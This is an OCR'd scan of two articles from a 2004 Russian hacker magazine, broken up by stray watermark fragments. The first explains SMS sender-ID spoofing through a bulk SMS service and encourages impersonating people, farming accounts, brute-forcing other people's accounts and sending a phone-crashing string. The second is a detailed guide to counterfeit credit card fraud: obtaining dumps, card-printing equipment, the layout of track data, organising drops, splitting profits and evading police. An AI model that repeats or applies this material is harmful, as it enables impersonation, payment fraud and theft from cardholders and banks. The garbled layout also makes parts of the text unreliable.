|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
В статье я назвал лишь основные баги. Об остальных CGI-уязвимостях ты можешь про- честь на www.opennet.ru/base/sec/cgi _security.txt.html.
63
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
||||
|
|
ВЗЛОМBUY |
||||||||
w Click |
to |
|
|
|
|
|
|
|||
|
|
|
|
|
|
m |
||||
|
SMS- |
|||||||||
w |
|
|
|
|
|
|
|
o |
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
g |
|
|
||
|
|
|
df |
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
СПУФИНГ—
ПОДСТАВА
МЕСЯЦА!
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
ХАКЕР/¹05(65)/2004 |
|
to |
|
|
|
|
|
|||
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
Ý |
ту статью я пишу за день до сдачи майского номера в печать, то есть в самый последний момент, когда это возможно сделать. И дело |
|
вовсе не в том, что я раздолбай и сдаю работу не вовремя. Дело в том, что я очень хочу поведать тебе один маленький, но крайне |
||
полезный секрет, который случайно открыл этой ночью. Зная ЭТО, ты сможешь слать sms-сообщения, указывая в качестве |
||
|
отправителя абсолютно любой номер! Это легко, но об этом очень мало кто знает. А те, кто знают - помалкивают и используют свои знания в темных целях. Я не жадный, читай!
ПОДМЕНА ОБРАТНОГО АДРЕСА В SMS-СООБЩЕНИЯХ
Çа окном – темно и метель (это в мае-то!). В мониторе белеет открытый браузер на ya.ru с запросом "sms программа отсылка". В трее, на часах -
2:04AM. Я ищу софт, позволяющий экономить время и неНОЧЬ. МЕТЕЛЬ. КЛИКАТЕЛЬ
заходить каждый раз на сайт своего ОПСОСА (за цензурой в журнале следят как надо, просто это сокращение от "ОПератор СОтовой Связи"), а отправлять sms’ки при помощи специального софта. Перелистывая бесконечные страницы со ссылками, натыкаюсь на некий Clickatell Bulk SMS Gateway. Забавно звучащий на русском "Кликатель" весело сообщал, что может без проблем интегрироваться с моей существующей системой сообщений в течение пары минут, также он говорил, что без проблем пошлет смс через SMPP, HTTP/S, SMTP, FTP и много через что еще. Произвольно выбрав из списка предлагаемого софта Messenger Pro 3, качаю и устанавливаю. Заинтересовавшись, даже регистрирую и ввожу код активации, полученный sms’кой на мобилу. Ну что ж, вот кликатель и предстал передо мной во всей красе: адреса, шаблоны, настройки...
Стоп, настройки! Первым делом я по привычке ткнулся туда и не пожалел.
ОБ ЭТОМ ПОЖАЛЕЛИ МОИ ДРУЗЬЯ
Опций было не так много, чтобы можно было запутаться. Но ровно столько, сколько нужно для такого рода программы. Не будем разбирать ее возможностей, ведь, во-первых, ты не за этим читаешь статью, а во-вторых, Эшу и так всегда хронически не хватает материала в его рубрику PC Zone. Так вот, в нижнем левом углу красовалась строка Sender ID, а ее значение было "Clickatell". Еще не до конца осознавая, что я делаю, я послал себе тестовую смс и убедился в своей правоте. Сообщение было доставлено от адресата с номером "Clickatell". Нет, ну я понимаю, что номер не может быть буквенным. Просто ведь тебе приходят системные сообщения от MTS, MEGAFON и т.д.? Вот и это то же самое. Разработчики программы явно не подозревали, что их детище запустит русский
Активация кода через веб. Номер уже в бане, нужно сменить
человек. Им и в голову не приходило, как можно подставлять людей при помощи этой опции. Итак, для проверки я ввел мамин телефон (7916xxxxxxx), потом зашел во вкладку SMS и сделал свое черное дело - отправил себе сообщение на мобилу. Через несколько секунд моя нокия негромко хрюкнула, и на дисплее высветилось - Mother. Обрадовавшись легкой победе, я начал одного за другим подкалывать своих друзей. Для начала Бублик получил срочное сообщение от Куттера: "Privet. Srochno vstavai, sadis' za comp i pishi stat'yu pro prezervativi v novuyu rubriku, 6kb". Далее Симбиозис был послан к девяти утра на Красную площадь брать интервью у представителя комитета по компьютерной безопасности нашего правительства, а трое моих сокурсников признались друг другу в нетрадиционной любви. Далее мои забавы внезапно закончились, потому что...
СУРОВАЯ РЕАЛЬНОСТЬ
Потому что у меня, оказывается, закончился лимит бесплатных sms’ок, о чем говорила надпись в нижнем правом углу: Balance: 0.0. Тогда я просто попробовал зарегистрировать еще один аккаунт, снова на свою мобилу. Код активации был получен без проблем - все сработало. Я получил дополнительные пять попыток поглумиться над приятелями. Уже ради спортивного интереса, проверяя, дураки ли сидят в саппорте Кликателя, я
64
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||
|
|
X |
|
|
|
|
|
|
||||
|
- |
|
|
|
|
|
d |
|
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|
||
P |
|
|
|
|
|
NOW! |
o |
|
||||
|
|
|
|
|
|
|
|
|||||
|
|
|
|
to |
BUY |
|
|
|
||||
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
m |
|
||||
|
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
||
|
|
|
df |
|
|
n |
e |
|
|
|||
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
-xcha |
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Messenger Pro 3 - самый легкий путь подшутить над другом!
быстро растратил 5 сообщений и повторил процесс регистрации/активации вновь. Оказалось, что не дураки. Третья попытка не увенчалась успехом - мой телефонный номер попросту забанили :(.
СОБИРАЕМ КРЕДИТЫ
Итак, давай посчитаем, сколько волшебных sms’ок мы можем послать. Как показали мои наблюдения, из одного номера можно выжать два (иногда три) аккаунта по 10 smsкредитов. Именно десять, а не пять, как было сказано раньше. Дело в том, что в парном процессе тестирования возможностей Кликателя, я выяснил следующее: если выполнять активацию кода не в окне приложения программы Messenger-Pro 3, а в браузере, по адресу www.clickatell.com/central/central/activation.php, то разработчики щедро дарят нам на 5 смсок больше. Честно говоря, я так и не понял, в чем причина этой разницы. Возможно, как предположил Никитос, это моральная компенсация за просмотр баннеров. Но нас это не должно особо волновать, мы будем слать, слать и слать. После того как лимит исчерпан полностью, нужно искать другой мобильный номер. Попроси, например, друга продиктовать тебе код из полученной на его номер мессаги. Так, постоянно обращаясь к многочисленным друзьям, можно увеличить число сообщений бесплатно и абсолютно легально! Есть, конечно же, другие пути получения аккаунта, и далеко не три-
ального. Во-первых, можно запастись здоровым именным словарем (имена чаще всего приносят успех) и окунуться в брутфорс. Если повезет, то ты "вспомнишь" пароль от чь- его-нибудь богатого аккаунта, содержащего на борту несколько тысяч sms’ок. Также смскредиты можно приобрести за свои (или чу- жие, если по креде) кровные по кредитной карте или WIRE-чеку. Приблизительная цена тысячи сообщений - 50 удмуртских ежей.
ПРИМЕНЕНИЕ
Социальная инженерия. Владея ей в совершенстве, можно произвести взлом, основанный на человеческом факторе. Можно крупно кого-ни- будь подставить, подшутить или напугать. Также подмену адреса from в смс-сообщениях выгодно использовать в домашних целях. Смотри, подставляешь свой номер в caller ID и пишешь нужное сообщение. Человек отвечает, и ответ принимает уже твоя мобила. А смысл в чем? А смысл в том, что исходящие послания у тебя получаются бесплатными! Главное быть рядом с компом. Кстати, также проверено, что если текст какой-нибудь известной "смертельной" смски, вроде "%English" для некоторых моделей Сименса, поместить в поле from, то эффект зависания будет иметь место быть :). Экспериментируй! Я уверен, что ты найдешь много интересных применений этой фишке, которыми поделишься со мной – пиши на hint@real.xakep.ru. z
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
Вот так твои SMS’ки доходят из программы на нужный мобильный номер
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
||||
|
|
ВЗЛОМBUY |
||||||||
w Click |
to |
|
|
|
|
|
m |
|||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
g |
|
|
||
|
|
|
df |
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
b00b1ik (b00b1ik@real.xakep.ru)
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
ХАКЕР/¹05(65)/2004 |
|
to |
|
|
|
|
|
|||
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
ПЛАСТИКОВЫЙÐÀÉ
Ïкредиток заключается лишь во вбивании номеров CC с целью купить у самого же себя аккаунт на порносайте. На самом деле, если подходить к делу творчески, открывается целое поле для мошеннической деятельности, кишащее разнообразными вариантамиосле всего того, что Хакер написал о кардинге и кардерах, могло сложиться впечатление, что искусство отмывания денег с чужих
махинаций. В последнее время все популярнее становится "пластиковый" путь, когда кардер физически изготавливает поддельную кредитную карту и снимает с нее несколько тысяч долларов.
ИЗГОТОВЛЕНИЕ ПОДДЕЛЬНЫХ КРЕДИТНЫХ КАРТ
Äля начала я расскажу об основных понятиях и сленге, которым оперируют кардеры. Дамп - это информация, записанная на магнитную полосу
карты. Он обычно состоит из
трех треков ("дорожка",ЛИКБЕЗ
англ.), каждый из которых представляет собой набор байт, несущий некоторую идентифицирующую карту информацию. Самый главный трек - второй, имея его, можно частично восстановить информацию, хранящуюся на первой дорожке. В большинстве карт используются только первый и второй треки, третий же существует лишь для записи дополнительной технической информации о транзакциях, которая чаще всего не представляет интереса для кардеров. Данные с магнитной ленты карточки считываются при помощи специального устройства, называемого POS-терминалом. Этот девайс связан с банковской системой и проверяет на корректность считанные данные, после чего осу-
Портативный ридер MSR500. Стоит $250
ществляет финансовую операцию - перевод денег с одного счета на другой.
Ключевой этап всей технологии "пластикового" кардинга - изготовление поддельной карточки - невозможен без специального оборудования и дампов реальных карт. Ведь даже зная полную информацию о карте и ее владельце, можно составить лишь первый трек дампа, второй, самый главный, восстановить по этим данным невозможно. Существует несколько способов получения дампов карточек жертв. Каждый кардер, занимающийся пластиком, выбирает наиболее выгодный для него способ.
Самый жестокий путь, который выбирают настоящие экстремалы - взлом процессингового центра банка или платежной сети, в которой производятся операции реальных магазинов. После получения контроля над руководящими серверами, изъять несколько тысяч дампов не составит большого труда. Более того, ты сможешь сам процессить финансовые платежи и перевести увесистую сумму на анонимный счет в каком-нибудь черногорском банке. Второй путь, пожалуй, самый популярный, состоит в следующем. Покупаются портативные ридеры карт и раздаются своим людям, которые работают в различных фирмах, клиенты которых часто расплачиваются кредитками. Такие вот "крысы" снимают информацию с карточек клиентов и передают ее кардерам.
И, наконец, самый простой путь - просто покупать дампы у людей, которые достали их одним из вышеуказанных способов. После того как ты получил дамп какой-то cc, данные наносятся на магнитную ленту подпольно изготовленной карты. К работе с таким вот пластиком кардеры подходят уже очень серьезно. Часто подделываются документы на имя кард-холдера, чтобы их можно было предъявить по просьбе кассира в слу- чае возникновения каких-то подозрительных
моментов в процессе осуществления платежа. Изготовив несколько карт, мошенники начинают их прокатывать в различных магазинах, покупая ценный товар (обычно дорогую электронику, ювелирные изделия, одежду etc.). Само собой, все накарженное таким образом добро впоследствии выгодно сбывается по более низкой цене, но за уже вполне реальные шуршащие деньги. Однако
èтут для кардеров не все так гладко, как могло показаться. Наличие дампа еще не гарантирует его стопроцентную работоспособность: из десяти карт в среднем три дают отказ по каким-либо причинам. А теперь представь такую картину. Набрал кардер полную тележку ноутбуков, подошел к кассе, а креда на имя Джона Ричардсона из Аризоны бабах - и не работает. И тут он, не краснея, достает другую, на имя подданной Великобритании Элизабет Тейлор, но карта опять не принимается. Друг, его повяжут еще до того, как он достанет третью карточ- ку, оформленную на богача из Испании.
Согласись, это довольно палевное занятие,
èподходить к каждой покупке надо со всей ответственностью - валидность той или иной кредитки опытные мошенники проверяют с мобильника через специальные wap-сайты не-
POS-терминал Р70 - хит продаж, используется во многих магазинах
66
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
||
Заготовка CR-80 с магнитной лентой для печати на ней изображения. $0,16 за штуку
посредственно перед совершением транзакции. Стоит учитывать и тот факт, что, работая с реальным пластиком, кардеры уже занимаются откровенным мошенничеством. Учитывая, что редко когда мошенник работает один, это уже "преступление, совершенное группой лиц по предварительному сговору" - условный срок может не удовлетворить судей.
ОБОРУДОВАНИЕ ДЛЯ ПЕЧАТИ КАРТ
Чтобы изготовить карты, ничем не отличающиеся по виду от настоящих, требуется специальное оборудование и так называемый "белый" пластик, который, на самом-то деле, не обязательно бывает белым - кардеры люди экономные, зачем тратиться на лишнюю краску, если карта, скажем, синяя? Сам пластик представляет собой кусок устойчи- вой к механическим и термическим повреждениям пластмассы и имеет габариты 85,6х53,9х0,76 мм. Сам механизм превращения белого пластика в полноценную карту состоит из нескольких этапов.
Для небольших тиражей используется метод сублимационной печати. Для этой цели используются специальные принтеры, печа- тающие изображение прямо на пластике. В зависимости от цены и производителя, они бывают монохромные или цветные, односторонние или двусторонние. В принципе, существенной разницы между односторонними и двусторонними принтерами нет, просто при печати на картах придется одну и ту же болванку прогонять дважды: сначала с одной стороны, потом с другой. Безусловными требованиями к печатающему оборудованию являются разрешение в 300 точек на дюйм и возможность печати без полей на картах толщиной 0,76 мм.
Если принтер не подходит хотя бы по одному из этих требований, то он не подходит для печати кредитных карт в принципе. Некоторые такие принтеры имеют возможность подключать дополнительные блоки, позволяющие наладить целый конвейер, выполняю-
щий кучу операций над изготавливаемой картой. Встроенный ламинатор после печати изображения на карте позволяет покрыть ее тонкой защитной пленкой, энкодер позволяет нанести дамп на магнитную полосу карты, при помощи эмбоссера на карту путем выдавливания наносится идентифицирующая информация - инфа о владельце, карте и банке-эмитенте. Типпер позволяет окрашивать эмбоссированный текст, также возможно подключение устройства, позволяющего вклеивать голограммы и полосы подписей. Самые известные торговые марки сублимационных и термотрансферных принтеров - Eltron и Fargo. Стоят такие принтеры от тысячи долларов и позиционируются производителями как устройства для печати клубных карт :). Подробнее об этом рассказано на www.eltron.ru.
Если принтер не поддерживает возможность подключения дополнительных модулей, описанных выше, кардеру приходится отдельно покупать все это оборудование.
Все эмбоссеры дают на выходе одинаковое качество, и разница между ними только в цене, которая зависит от их производительности. Самый дешевый вариант - ручной эмбоссер - не требует даже электропитания. При выборе типпера стоит обратить внимание на цену и доступность фольги для него. Пожалуй, это все оборудование, которое потребуется кардеру для организации подпольного цеха по производству левых карт. Полный набор оборудования можно купить за 3-4 тысячи долларов.
ЧТО У ДАМПА ВНУТРИ?
Как я уже говорил, дамп представляет собой совокупность информации, записанной на треки магнитной ленты кредитной карты - основной интерес для кардера представляют только первый и второй треки. Возьмем абстрактный пример дампа, состоящего из треков 1 и 2, и разберемся, что в них записано:
B4000001234567890^PETROV/IVAN^0310101
1123400567000000;;4000001234567890=0310 1011123495679991. В этом примере B4000001234567890^PETROV/IVAN^031010111 23400567000000 является информацией первого трека, а 4000001234567890=03101011123495679991 - информация, занесенная во второй трек. Не стоит пытаться использовать алгоритм построения первого трека, используя данные со второго, так как приведенный выше пример является лишь наглядным пособием, и в разных банках используются разные шаблоны.
РАБОТНИКИ КОСТРА
Âинтернете я наткнулся на печальную историю о так называемых работниках Костра. Эти парни, выехав за границу для
прокатывания левых карт в магазинах, попались в руки стражей порядка. Самое интересное, что вся операция была спланирована до мелочей и не дала ни единого сбоя. Накупив кучу ноутбуков, ребята направились к месту сбора и решили по пути приобрести телефонных карт долларов на тридцать. Еще полчаса назад карта, на которую они покупали товар, отлично работала. Решив не проверять ее на работоспособность, парни пошли отовариваться телефонными картами и попались в руки полисменов :(. Вроде как они до сих пор сидят в польской тюрьме, пытаясь доказать свою невиновность и выбраться на свободу.
ПЛАСТИКОВЫЙ РАЙ
Теперь посмотрим пристальнее на первый трек: он начинается с латинской буквы В, которая указывает на то, что это банковская карта. 400000 123456789 0 - это так называ-
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
Принтер для печати на пластиковых картах. Стоит чуть больше $1k
емый номер карты или PAN, как его называют профессионалы, 400000 - BIN, по которому можно определить банк, эмитировавший карту, и тип самой кредитки, 123456789 - номер карты в банке.
Ноль в самом конце PAN'а является контрольной цифрой. ^PETROV/IVAN^ - имя владельца карты, кард-холдера. 0310 - экспайр карты, то есть та дата, до которой карта является действительной. В данном случае это октябрь 2003 года. 101 – сервис-код. Обычно он равняется 101. 1 - номер ключа, по которому зашифрован PIN-код карты. Нужен только при работе с банкоматом и при тех операциях, когда требуется PIN. 1234 - зашифрованное значение PIN-кода. Нужно оно в тех же случаях, что и номер ключа выше. 567 - CVV, проверочное значение для номера карты. Получается путем шифрования парой банковских ключей сервис-кода, PАN'а и экспайра. CVV2 получается тем же путем, только сервис-код заменяется нулями, из-за чего значения ЦВВ и ЦВВ2 отличаются друг от друга. Второй трек во многом схож с первым, но он является основным, и, имея его, можно построить информацию с первого трека.
РАЗДЕЛЕНИЕ ТРУДА
Умный кардер никогда не станет делать всю работу в одиночку. На это у него просто не хватит сил и времени. Да и небезопасно это. Поэтому профессиональный кардер лишь руководит глобально всем процессом, мотивируя хорошими деньгами специально нанятых им людей. Сам же он, по сути, остается "не при делах", только рубит капусту с оборота. Но обо всем по порядку.
Держать оборудование для печати пластика у себя дома кардер не станет - зачем ему лишний риск? Обычно для этого есть специальный человек, который мало с кем контактирует и особо нигде не светится. У него хранится все оборудование, а кардер платит ему деньги за работу, молчание и послушание.
Имя, адрес и телефон такого человека кардер обычно нигде не записывает из соображений конфиденциальности и посещает его в строго оговоренное заранее время лишь для того, чтобы забрать изготовленные карты и принести новую порцию дампов. Следующий этап - покупка всяческого стафа за счет владельца подделанной карты. Этим занимаются дропы - люди интеллигентного вида, которые ходят по магазинам с фейковым пластиком и совершают дорогие покупки. Умные кардеры выстраивают также третий уровень
Хотя принтерные карты и стоят дешевле офсетных, но вероятность того, что кардер на них спалится, потеряв кучу дампов, времени, нервов и свою свободу, велика.
Кардер никогда не идет на дело, не проверив предварительно карту. Еще полчаса назад отлично работавшая карта может дать отказ по каким-ли- бо причинам, даже при оплате мелкой покупки.
Более подробную информацию о работе с пластиком можно получить на ресурсах в интернете, посвященных кардингу: www.cvv.ru и www.carderplanet.cс. На форумах этих проектов лежит много инфы, которой делятся профессионалы.
67
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
||||
|
|
|
ВЗЛОМBUY |
|||||||
w Click |
to |
|
|
|
|
|
m |
|||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
g |
|
|
||
|
|
|
df |
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Вся информация, приведенная в статье, дана исключительно в ознакомительных целях. За любое использование читателем этой информации автор и редакция журнала не несут никакой ответственности.
ПЛАСТИКОВЫЙ РАЙ
|
|
|
все, что сам знает о работе |
|
|
|
|
|
|
|
с пластиком. Это делается |
|
|
|
для того, чтобы дроповод |
|
|
|
мог грамотнее направлять |
|
|
|
своих дропов и давать им |
|
|
|
полезные советы, в резуль- |
|
|
|
тате чего дроп будет |
|
|
|
чувствовать себя увереннее |
|
|
|
и сможет импровизировать |
|
|
|
при выполнении заказа, иг- |
|
|
|
рая то импульсивного италь- |
|
|
|
янца, то скупого немца, то |
|
|
|
сынка понурого, но богатого |
|
|
|
англичанина. |
|
|
|
Все это благотворно влия- |
|
|
|
ет на исход операции, что |
|
|
|
очень важно для любого чле- |
|
|
|
на выстроенной цепочки: |
|
|
каждый пойманный дроп уве- |
|
Сайт с кучей оборудования, необходимого настоящему кардеру |
|
||
|
|
|
личивает шансы на крах всей |
защиты - нанимают надежного человека, ко- |
|
|
|
системы в целом и приближает то время, ког- |
|||
торый подыскивает подходящих дропов, |
да кардер попадет за решетку. Дропы также, |
||
шпыняет их, проводит разъяснительные бе- |
во избежание подозрительных взглядов про- |
||
седы, повышение квалификации и т.д :). |
давцов, должны соответствовать своим внеш- |
||
Дроп получает за свою работу процент, со- |
ним видом той сумме, на которую делается |
||
ответственно, он напрямую заинтересован в |
заказ. Действительно, если бы я был продав- |
||
получении максимальной прибыли с каждой |
цом, и у меня производилась покупка дорого- |
||
карты, но и о своей заднице он тоже постоян- |
го ноутбука человеком бомжеватого вида, я |
||
но беспокоится - ведь, если что, крайним |
бы тотчас же забил тревогу :). Чаще всего |
||
окажется именно он. Человек, занимающийся |
выручка делится между "коллегами" следую- |
||
контролем дропов, ходит с ними по магази- |
щим образом: человек, у которого хранится |
||
нам, контролируя производимые покупки, |
оборудование для печати пластика, получает |
||
после чего собирает товар и передает его |
5-10% от общего дохода, дроп за свой труд |
||
кардеру в заранее оговоренном месте в наз- |
поощряется 10-20% от общака, а дроповод |
||
наченное время. Для связи с таким дропово- |
имеет свою долю примерно в 20-30%. Таким |
||
дом у кардера существует отдельная мобила |
образом, умный кардер, руководя всем про- |
||
и заранее придуманная байка на случай, если |
цессом и являясь мозгом организации, полу- |
||
вдруг дропа или дроповода повяжут, и при- |
чает ни много ни мало - 40-60%, что является |
||
дется объяснять дядям-милиционерам, по ка- |
неплохим наваром, согласись. Ведь с одной |
||
кой причине они так много общались. |
карты при хорошем раскладе можно снять до |
||
Само собой, в разговорах по телефону |
$10k, соответственно, если 10 дропов будут |
||
кардер и дроповод используют специальный |
облизывать по одной карте в день, месячный |
||
сленг и своего рода стеганографию в стиле |
доход кардера с учетом выходных и празд- |
||
"Ездил к бабушке, привез яблок, антоновка, |
ничных дней составит более полумиллиона |
||
килограмм 10. Давай встретимся, покуша- |
долларов! Тут уже можно подумать об опла- |
||
ешь, витамины нужны, скоро зима". То же |
чиваемом отпуске, медицинской страховке и |
||
самое касается и СМС - федералы могут |
бесплатных обедах в ресторане для своих |
||
долго "пасти" кардеров, стараясь собрать |
сотрудников :). |
||
как можно больше доказательств. Как я уже |
|
КТО ЗА ЭТО ПЛАТИТ? |
|
отмечал выше, кардер должен доверять |
|
||
дроповоду, ведь он всегда рассказывает ему |
Наверное, ты уже задался вопросом: кто же |
||
|
остается крайним при такого рода кардерских |
||
|
махинациях с использованием карточек с кра- |
||
|
деными дампами? Возьмем, к примеру, ма- |
||
|
нуалы международной платежной системы |
||
|
Visa. Все операции возлагаются в случае ма- |
||
|
хинаций на банк-эмитент, то есть на банк, |
||
|
выдавший кредитную карту кард-холдеру. Но |
||
|
это совсем не значит, что можно радостно |
||
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
ХАКЕР/¹05(65)/2004 |
|
to |
|
|
|
|
|
|||
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
потирать руки и идти в магазин договари- ваться с продавцом о работе "фифти-фифти" и день и ночь без устали прокатывать карточ- ки через пос-терминал.
Визовские мануалы гласят, что если в торговой точке будет превышен разрешенный процентный барьер операций, по которым приходят отказы и протесты, и банк, обслуживающий торговую точку, ни- чего по этому поводу не предпринимает, то платежная система имеет право оспорить данные операции и возложить все убытки на этот банк. Это не значит, что дело тухлое. Можно прокатывать карты че- рез POS-терминал магазина, но за короткий срок (в течение нескольких дней). В этом случае банк, обслуживающий торговую точку, может оспорить возложенную на него материальную ответственность, заявив и доказав, что на момент проведения мошеннических операций у него не было никаких опротестований, и он не мог принять никаких мер по отношению к торговой точке. Тогда уже убытки будет нести сама платежная система (Виза или любая другая, в зависимости от того, какие фальшивые карты были использованы). Получается, что на деньги попадают все, в зависимости от того, как работали кардеры.
Разумеется, никто не желает расставаться со своими честно заработанными деньгами, и все стараются максимально себя обезопасить, предотвратив заранее возможное кидалово. Многие торговые точки, обслуживающие клиентов по кредитным картам, требуют предъявления вместе с карточкой документов, удостоверяющих личность. Этот шаг является неправомерным, так как никто не имеет права требовать с тебя документы до начала авторизации. В процессе авторизации, если появились какие-то вопросы, неувязки, требование предъявить документы вполне нормально, но ДО авторизации - самая настоящая импровизация работников торговых точек. С другой стороны, их тоже можно понять: никто не желает быть кинутым, и излишняя осторожность никогда не помешает.
ЭПИЛОГ
